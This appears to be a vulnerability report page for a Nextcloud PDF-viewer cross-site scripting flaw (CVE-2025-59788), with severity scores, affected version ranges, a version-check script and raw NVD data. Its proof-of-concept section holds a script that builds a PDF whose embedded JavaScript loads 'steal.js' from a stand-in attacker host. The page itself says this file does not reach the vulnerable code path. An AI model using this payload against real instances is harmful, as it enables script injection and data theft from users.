Security Vulnerability Report

CVE-2025-59788

Published: 2025-12-04 19:16:04
Last Modified: 2026-03-25 21:35:25

Description

Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, and 32.0.1 allows attackers to execute arbitrary JavaScript in the context of a user's browser via a crafted PDF file to viewer.html. This issue is related to CVE-2024-4367, but the root cause of this Nextcloud issue is that the product exposes executable example code on a same-origin basis.

CVSS Details

CVSS Score
6.4 (CNA vector, listed as secondary in the NVD record) / 5.4 (NVD analysis, primary)
Severity
MEDIUM (both vectors)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N (CNA, 6.4)
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N (NVD, 5.4)
The two vectors differ only in User Interaction: NVD scores UI:R because a victim has to open the crafted PDF in the viewer, which lowers the base score from 6.4 to 5.4. PR:L reflects that the attacker needs an account that can get a PDF into the instance; S:C reflects that the script runs in the Nextcloud origin rather than in a sandboxed one.
Weaknesses: CWE-79 (Cross-site Scripting; NVD, primary) and CWE-749 (Exposed Dangerous Method or Function; CNA, secondary).

Configurations (Affected Products)

cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:* (community edition), affected ranges from the NVD configuration:
  30.0.0 <= version < 30.0.17
  31.0.0 <= version < 31.0.10
  32.0.0 <= version < 32.0.1
cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:* (enterprise edition), affected ranges from the NVD configuration (entries after the 31.x range are cut off in the raw JSON below):
  22.0.0 <= version < 22.2.10.33
  23.0.0 <= version < 23.0.12.29
  24.0.0 <= version < 24.0.12.28
  25.0.0 <= version < 25.0.13.23
  26.0.0 <= version < 26.0.13.20
  27.0.0 <= version < 27.1.11.20
  28.0.0 <= version < 28.0.14.11
  29.0.0 <= version < 29.0.16.8
  30.0.0 <= version < 30.0.17
  31.0.0 <= version < 31.0.10
First fixed release per branch (from the description): 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, 32.0.1. Anything older on the same branch is affected.
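As an added example, not Nextcloud's or NVD's own code, the following Python turns the affected-version list above into a check that can be run against an instance's unauthenticated /status.php endpoint. The endpoint path and its "version"/"versionstring" fields are assumed from Nextcloud's status endpoint and are not stated on this page; the sample response is constructed, and the fetch helper is only there for live use.

```python
"""Check a Nextcloud version string against the CVE-2025-59788 affected ranges.

Added example (not Nextcloud's or NVD's code). Assumptions: the version comes
from Nextcloud's unauthenticated /status.php endpoint, whose JSON carries a
four-part internal "version" (e.g. 30.0.16.2); the fixed versions below are
the ones listed on this page.
"""
import json
import re
import urllib.request

# First fixed release per branch, from the advisory text. Branches 30-32 are
# given as three-part versions, earlier branches as four-part ones.
FIXED = {
    22: (22, 2, 10, 33), 23: (23, 0, 12, 29), 24: (24, 0, 12, 28),
    25: (25, 0, 13, 23), 26: (26, 0, 13, 20), 27: (27, 1, 11, 20),
    28: (28, 0, 14, 11), 29: (29, 0, 16, 8),  30: (30, 0, 17),
    31: (31, 0, 10),     32: (32, 0, 1),
}


def parse_version(text):
    """'30.0.16.2' -> (30, 0, 16, 2); tolerates a 'v' prefix or trailing tags."""
    parts = tuple(int(p) for p in re.findall(r"\d+", text))
    if not parts:
        raise ValueError(f"no version number in {text!r}")
    return parts


def is_vulnerable(version):
    """True/False for a branch NVD lists, None for a branch it does not."""
    v = parse_version(version)
    fixed = FIXED.get(v[0])
    if fixed is None:
        return None
    # Compare only as many components as the fixed version has, so the
    # four-part internal version 30.0.16.2 is judged against 30.0.17.
    return v[:len(fixed)] < fixed


def triage_status(status_json):
    """Reduce a /status.php body to a finding dict (assumed field names)."""
    status = json.loads(status_json)
    version = status.get("version") or status.get("versionstring", "")
    result = is_vulnerable(version)
    fixed_in = None
    if result is not None:
        fixed_in = ".".join(str(p) for p in FIXED[parse_version(version)[0]])
    return {"version": version, "vulnerable": result, "fixed_in": fixed_in}


def fetch_status(base_url, timeout=10):
    """Fetch /status.php from a live instance (network; not used by the sample run)."""
    url = f"{base_url.rstrip('/')}/status.php"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8")


# Constructed sample response in the shape /status.php returns; not from a real host.
SAMPLE_STATUS = (
    '{"installed":true,"maintenance":false,"needsDbUpgrade":false,'
    '"version":"30.0.16.2","versionstring":"30.0.16",'
    '"edition":"","productname":"Nextcloud"}'
)

if __name__ == "__main__":
    print(triage_status(SAMPLE_STATUS))
```

The comparison deliberately truncates the observed version to the length of the fixed version, which is what makes the NVD ranges (versionStartIncluding / versionEndExcluding) line up with the four-part build numbers an instance reports; a branch outside 22 through 32 returns None rather than a guess.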

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59788 PoC: PDF carrying a /OpenAction JavaScript action, for
# upload to Nextcloud and opening in the files_pdfviewer viewer.html.
# The original listing wrapped the PDF in HTML comments (not valid PDF) and
# hand-wrote xref offsets that did not match the object positions; this
# script emits the same four objects with a computed cross-reference table
# so the file parses.
import sys

# Payload placed in the /JS entry. Its parentheses are balanced, so it needs
# no escaping inside a PDF literal string.
JS = ("var script = document.createElement('script');"
      "script.src = 'https://attacker.com/steal.js';"
      "document.head.appendChild(script);")

OBJECTS = [
    b"<< /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >>",
    b"<< /Type /Pages /Kids [4 0 R] /Count 1 >>",
    b"<< /Type /Action /S /JavaScript /JS (" + JS.encode() + b") >>",
    b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
]

def build_pdf(objects):
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))          # byte offset of "N 0 obj"
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"       # every xref entry is exactly 20 bytes
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += b"trailer\n<< /Size %d /Root 1 0 R >>\n" % (len(objects) + 1)
    out += b"startxref\n%d\n%%%%EOF\n" % xref_pos
    return bytes(out)

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else "malicious.pdf"
    with open(path, "wb") as fh:
        fh.write(build_pdf(OBJECTS))

What this file does and does not exercise: /OpenAction carries PDF-level JavaScript. PDF.js evaluates such actions only when its scripting support is enabled, and then inside a sandbox that has no access to the embedding page's DOM, so the document.createElement call above never runs in the Nextcloud origin. The same-origin script execution this CVE describes comes from the viewer code path shared with CVE-2024-4367, where a missing type check let font metadata from the PDF flow into dynamically generated glyph-rendering code in the viewer; a plain /OpenAction file does not reach it. Use the listing as a fixture for confirming that the shipped example viewer.html is reachable and renders attacker-supplied PDFs on the instance's origin, and use the version ranges above, not this file, to decide whether an instance is affected.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59788", "sourceIdentifier": "[email protected]", "published": "2025-12-04T19:16:04.380", "lastModified": "2026-03-25T21:35:25.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in a reachable files_pdfviewer example directory in Nextcloud with versions before 22.2.10.33, 23.0.12.29, 24.0.12.28, 25.0.13.23, 26.0.13.20, 27.1.11.20, 28.0.14.11, 29.0.16.8, 30.0.17, 31.0.10, and 32.0.1 allows attackers to execute arbitrary JavaScript in the context of a user's browser via a crafted PDF file to viewer.html. This issue is related to CVE-2024-4367, but the root cause of this Nextcloud issue is that the product exposes executable example code on a same-origin basis."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": 
"OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "30.0.0", "versionEndExcluding": "30.0.17", "matchCriteriaId": "8A3D94EC-A877-458D-9A33-5451FE97A785"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "2059C891-F256-482A-99BF-D912A1657419"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:-:*:*:*", "versionStartIncluding": "32.0.0", "versionEndExcluding": "32.0.1", "matchCriteriaId": "A75D466C-B154-480A-9D4F-8E9454147156"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "22.0.0", "versionEndExcluding": "22.2.10.33", "matchCriteriaId": "4440D2E7-2FCB-4CC2-A57F-708AAB0CD22B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "23.0.0", "versionEndExcluding": "23.0.12.29", "matchCriteriaId": "51922DA7-3112-422A-9F66-9CAA54E89D8F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "24.0.0", "versionEndExcluding": "24.0.12.28", "matchCriteriaId": "6AC7C575-7348-45A1-9023-A6606541987B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "25.0.0", "versionEndExcluding": "25.0.13.23", "matchCriteriaId": "000C64D7-C76D-4E69-9705-18132C615456"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "26.0.0", "versionEndExcluding": "26.0.13.20", "matchCriteriaId": "D9491A91-2A7C-4C84-89E9-219422D91350"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "27.0.0", "versionEndExcluding": "27.1.11.20", "matchCriteriaId": "CFD3A15F-58D7-4C3D-A49F-065F28ED6361"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "28.0.0", "versionEndExcluding": "28.0.14.11", "matchCriteriaId": "B55EF258-E98A-43A9-B73C-AE62D448421D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "29.0.0", "versionEndExcluding": "29.0.16.8", "matchCriteriaId": "7710228F-2984-4F9A-8360-0054E7E78687"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "30.0.0", "versionEndExcluding": "30.0.17", "matchCriteriaId": "AE19F75F-6A78-4770-B7C6-338570FA7184"}, {"vulnerable": true, "criteria": "cpe:2.3:a:nextcloud:nextcloud_server:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "31.0.0", "versionEndExcluding": "31.0.10", "matchCriteriaId": "64C21E45-22B8-49B2 ... (truncated)